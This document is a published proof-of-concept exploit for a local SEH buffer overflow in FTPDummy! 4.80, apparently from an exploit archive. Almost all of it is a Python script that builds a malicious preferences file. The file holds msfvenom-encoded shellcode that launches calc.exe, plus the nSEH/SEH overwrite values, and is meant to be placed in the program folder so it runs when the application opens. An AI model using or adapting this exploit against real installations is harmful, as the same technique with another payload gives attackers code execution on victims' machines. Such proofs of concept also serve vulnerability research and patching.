FTPDummy! version 4.80 local SEH buffer overflow exploit that pops calc.exe.
5dcc1a08b3ade2f526a2a0acfc1b5bbc
# Exploit Title: FTPDummy! 4.80 - Local Buffer Overflow (SEH)
# Date: 2020-07-22
# Author: Felipe Winsnes
# Software Link: http://www.dummysoftware.com/ftpdummy.html
# Version: 4.80
# Tested on: Windows 7 (x86)
# Blog: https://whitecr0wz.github.io/
# Proof of Concept:
# 1.- Run the python script, it will create the file "ftpdummypref3.dat".
# 2.- Place the generated file into "C:\Program Files\FTPDummy!\".
# 3.- Open the application.
# 4.- Profit.
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 448 bytes
buf = b""
buf += b"\x89\xe0\xd9\xc5\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x68\x68\x6e"
buf += b"\x62\x53\x30\x53\x30\x67\x70\x35\x30\x6f\x79\x5a\x45"
buf += b"\x34\x71\x4f\x30\x71\x74\x4e\x6b\x30\x50\x74\x70\x6c"
buf += b"\x4b\x43\x62\x54\x4c\x4e\x6b\x56\x32\x67\x64\x4c\x4b"
buf += b"\x32\x52\x36\x48\x74\x4f\x58\x37\x61\x5a\x35\x76\x30"
buf += b"\x31\x69\x6f\x6c\x6c\x37\x4c\x35\x31\x31\x6c\x75\x52"
buf += b"\x54\x6c\x57\x50\x39\x51\x48\x4f\x66\x6d\x56\x61\x7a"
buf += b"\x67\x59\x72\x6c\x32\x52\x72\x63\x67\x4e\x6b\x62\x72"
buf += b"\x32\x30\x4e\x6b\x73\x7a\x77\x4c\x6c\x4b\x52\x6c\x54"
buf += b"\x51\x53\x48\x68\x63\x51\x58\x37\x71\x4b\x61\x72\x71"
buf += b"\x4c\x4b\x32\x79\x61\x30\x47\x71\x5a\x73\x4c\x4b\x57"
buf += b"\x39\x76\x78\x48\x63\x47\x4a\x67\x39\x6e\x6b\x50\x34"
buf += b"\x6e\x6b\x43\x31\x4a\x76\x34\x71\x69\x6f\x6c\x6c\x49"
buf += b"\x51\x6a\x6f\x54\x4d\x65\x51\x68\x47\x45\x68\x6b\x50"
buf += b"\x63\x45\x6b\x46\x76\x63\x43\x4d\x6a\x58\x67\x4b\x43"
buf += b"\x4d\x74\x64\x51\x65\x4a\x44\x42\x78\x6c\x4b\x76\x38"
buf += b"\x56\x44\x53\x31\x6e\x33\x32\x46\x4c\x4b\x36\x6c\x72"
buf += b"\x6b\x6c\x4b\x66\x38\x75\x4c\x53\x31\x4a\x73\x6e\x6b"
buf += b"\x33\x34\x4c\x4b\x47\x71\x6e\x30\x4b\x39\x77\x34\x44"
buf += b"\x64\x35\x74\x51\x4b\x63\x6b\x63\x51\x70\x59\x70\x5a"
buf += b"\x76\x31\x69\x6f\x59\x70\x73\x6f\x53\x6f\x71\x4a\x4c"
buf += b"\x4b\x46\x72\x38\x6b\x6e\x6d\x71\x4d\x50\x6a\x47\x71"
buf += b"\x4e\x6d\x4f\x75\x4e\x52\x47\x70\x37\x70\x53\x30\x42"
buf += b"\x70\x32\x48\x76\x51\x6e\x6b\x32\x4f\x4f\x77\x79\x6f"
buf += b"\x5a\x75\x4f\x4b\x6b\x50\x47\x6d\x44\x6a\x57\x7a\x50"
buf += b"\x68\x79\x36\x4e\x75\x6d\x6d\x6d\x4d\x6b\x4f\x49\x45"
buf += b"\x57\x4c\x77\x76\x51\x6c\x74\x4a\x4b\x30\x49\x6b\x59"
buf += b"\x70\x34\x35\x63\x35\x4d\x6b\x50\x47\x74\x53\x44\x32"
buf += b"\x52\x4f\x31\x7a\x75\x50\x53\x63\x69\x6f\x38\x55\x42"
buf += b"\x43\x61\x71\x72\x4c\x65\x33\x54\x6e\x61\x75\x70\x78"
buf += b"\x50\x65\x73\x30\x41\x41"
start = "\x41"* 8
start += "\x0d\x0a\x31\x0d\x0a"
ending = "\x0d\x0a"
end = "170.1.1.0"
end += "\x0d\x0a"
end += "\x22"
end += "C:\Archivos2de2programa\FTPDummy!\FTPDummy!2418101EXE"
end += "\x22"
nseh = "\x70\x08\x71\x06"
seh = struct.pack("<I", 0x0044D078)
buffer = start + "A" * 477 + nseh + seh + "A" * 5 + buf + "\xff" * 2000 + ending + end
try:
f = open ("ftpdummypref3.dat", "w")
f.write(buffer)
f.close()
print "[+] The file has been created successfully!"
except:
print "[!] There has been an error while creating the file."